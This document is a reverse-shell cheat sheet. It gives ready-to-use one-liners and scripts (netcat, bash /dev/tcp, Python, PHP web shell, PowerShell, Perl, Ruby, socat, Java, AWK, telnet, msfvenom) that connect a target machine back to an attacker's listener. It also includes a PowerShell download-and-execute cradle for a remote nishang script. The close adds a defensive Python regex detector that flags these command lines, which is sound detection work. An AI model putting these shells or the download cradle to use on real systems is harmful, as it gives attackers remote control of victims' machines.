Using Netcat
Netcat Simple Shell: On the attacker's machine:
nc -lvp 4444
On the target machine:
nc <attacker_IP> 4444 -e /bin/bash
Netcat with mkfifo: On the attacker's machine:
nc -lvp 4444
On the target machine:
mkfifo /tmp/f; nc <attacker_IP> 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1; rm /tmp/f
Using Bash
Bash One-Liner: On the attacker's machine:
nc -lvp 4444
On the target machine:
bash -i >& /dev/tcp/<attacker_IP>/4444 0>&1
Bash with /dev/tcp:
exec 5<>/dev/tcp/<attacker_IP>/4444; cat <&5 | while read line; do $line 2>&5 >&5; done
Using Python
Python 2: On the attacker's machine:
nc -lvp 4444
On the target machine:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Python 3:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker_IP>",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Using PHP
PHP One-Liner: On the attacker's machine:
nc -lvp 4444
On the target machine (e.g., in a web shell):
php -r '$sock=fsockopen("<attacker_IP>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
PHP Web Shell Script: On the attacker's machine:
nc -lvp 4444
On the target machine, place the following PHP script on a web server:
<?php $sock=fsockopen("<attacker_IP>",4444); exec("/bin/sh -i <&3 >&3 2>&3"); ?>
Using PowerShell
PowerShell One-Liner: On the attacker's machine:
nc -lvp 4444
On the target machine:
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('<attacker_IP>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Using Perl
Perl One-Liner: On the attacker's machine:
nc -lvp 4444
On the target machine:
perl -e 'use Socket;$i="<attacker_IP>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Using Ruby
Ruby One-Liner: On the attacker's machine:
nc -lvp 4444
On the target machine:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<attacker_IP>","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Using Socat
Socat Simple Reverse Shell: On the attacker's machine:
socat TCP-LISTEN:4444,reuseaddr -
On the target machine:
socat TCP:<attacker_IP>:4444 EXEC:/bin/bash
Using Node.js
Node.js One-Liner: On the attacker's machine:
nc -lvp 4444
On the target machine:
node -e "require('child_process').exec('nc <attacker_IP> 4444 -e /bin/sh')"
Using Java
Java Reverse Shell: On the attacker's machine:
nc -lvp 4444
On the target machine:
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class ReverseShell {
    public static void main(String[] args) {
        String host = "<attacker_IP>";
        int port = 4444;
        String cmd = "/bin/bash";
        try {
            Socket s = new Socket(host, port);
            Process p = Runtime.getRuntime().exec(cmd);
            InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
            OutputStream po = p.getOutputStream(), so = s.getOutputStream();
            while (!s.isClosed()) {
                while (pi.available() > 0) so.write(pi.read());
                while (pe.available() > 0) so.write(pe.read());
                while (si.available() > 0) po.write(si.read());
                so.flush();
                po.flush();
                Thread.sleep(50);
                try {
                    p.exitValue();
                    break;
                } catch (Exception e) {}
            }
            p.destroy();
            s.close();
        } catch (Exception e) {}
    }
}
Using xterm
xterm Reverse Shell: On the attacker's machine:
Xnest :1
xhost +<target_IP>
On the target machine:
xterm -display <attacker_IP>:1
Using Telnet
Telnet Reverse Shell: On the attacker's machine:
nc -lvp 4444
On the target machine:
rm -f /tmp/p; mknod /tmp/p p && telnet <attacker_IP> 4444 0</tmp/p | /bin/sh 1>/tmp/p 2>&1
Using AWK
AWK Reverse Shell: On the attacker's machine:
nc -lvp 4444
On the target machine:
awk 'BEGIN {s = "/inet/tcp/0/<attacker_IP>/4444"; while(1) {printf "> " |& s; if ((s |& getline c) <= 0) break; while ((c |& getline) > 0) print $0 |& s; close(c)}}'
Using MSFvenom (Metasploit)
MSFvenom Reverse Shell: Generate a payload:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<attacker_IP> LPORT=4444 -f elf > shell.elf
On the attacker's machine:
msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set LHOST <attacker_IP>
set LPORT 4444
exploit
On the target machine, run the generated payload:
chmod +x shell.elf
./shell.elf
Using PowerShell with Invoke-PowerShellTcp
PowerShell Invoke-PowerShellTcp: On the attacker's machine:
nc -lvp 4444
On the target machine:
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress <attacker_IP> -Port 4444
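As an added example that is not part of this cheat sheet: a small Python detector, written from the defender's side, that flags process command lines matching the reverse-shell families listed above. The sample command lines are constructed (203.0.113.10 is a documentation address, assumed here), and the rule set is my own, not from any named product.

```python
import re

# Constructed sample process command lines (as an EDR or auditd execve feed
# might show them); 203.0.113.10 is a documentation address, not a real host.
SAMPLE_CMDLINES = [
    "bash -i >& /dev/tcp/203.0.113.10/4444 0>&1",
    "nc 203.0.113.10 4444 -e /bin/bash",
    "mkfifo /tmp/f; nc 203.0.113.10 4444 < /tmp/f | /bin/sh > /tmp/f 2>&1",
    "python3 -c 'import socket,subprocess,os;s=socket.socket();"
    "s.connect((\"203.0.113.10\",4444));os.dup2(s.fileno(),0)'",
    "php -r '$sock=fsockopen(\"203.0.113.10\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = "
    "New-Object System.Net.Sockets.TCPClient('203.0.113.10',4444)",
    "socat TCP:203.0.113.10:4444 EXEC:/bin/bash",
    "grep -r /dev/tcp /etc",       # benign: no redirection into /dev/tcp
    "nc -zv db.internal 5432",     # benign: port check, no -e shell
]

# One rule per technique family on this page: (rule name, compiled regex).
RULES = [
    ("bash_dev_tcp_redirect", re.compile(r"[<>&]\s*/dev/tcp/\S+/\d+")),
    ("netcat_exec_shell",     re.compile(r"\bnc(?:at)?\b.*\s-[a-z]*e\s+/bin/(?:ba)?sh")),
    ("fifo_piped_shell",      re.compile(r"\b(?:mkfifo|mknod)\b.*\|\s*/bin/(?:ba)?sh")),
    ("python_socket_dup2",    re.compile(r"socket\.socket\(.*dup2\(")),
    ("php_fsockopen_exec",    re.compile(r"fsockopen\(.*\bexec\(")),
    ("powershell_tcpclient",  re.compile(r"Sockets\.TCPClient\(", re.IGNORECASE)),
    ("socat_exec_shell",      re.compile(r"\bsocat\b.*EXEC:/bin/(?:ba)?sh")),
]


def classify(cmdline):
    """Return the names of every rule whose pattern matches this command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Return (cmdline, matched rule names) for each line that hit at least one rule."""
    hits = []
    for line in cmdlines:
        names = classify(line)
        if names:
            hits.append((line, names))
    return hits


if __name__ == "__main__":
    for line, names in scan(SAMPLE_CMDLINES):
        print(f"[{', '.join(names)}] {line}")
```

Command-line matching is a first-pass signal only: a download cradle like the Invoke-PowerShellTcp one above, or an encoded payload, shows none of these strings and needs network telemetry (an outbound connection from a shell or interpreter process) to be caught.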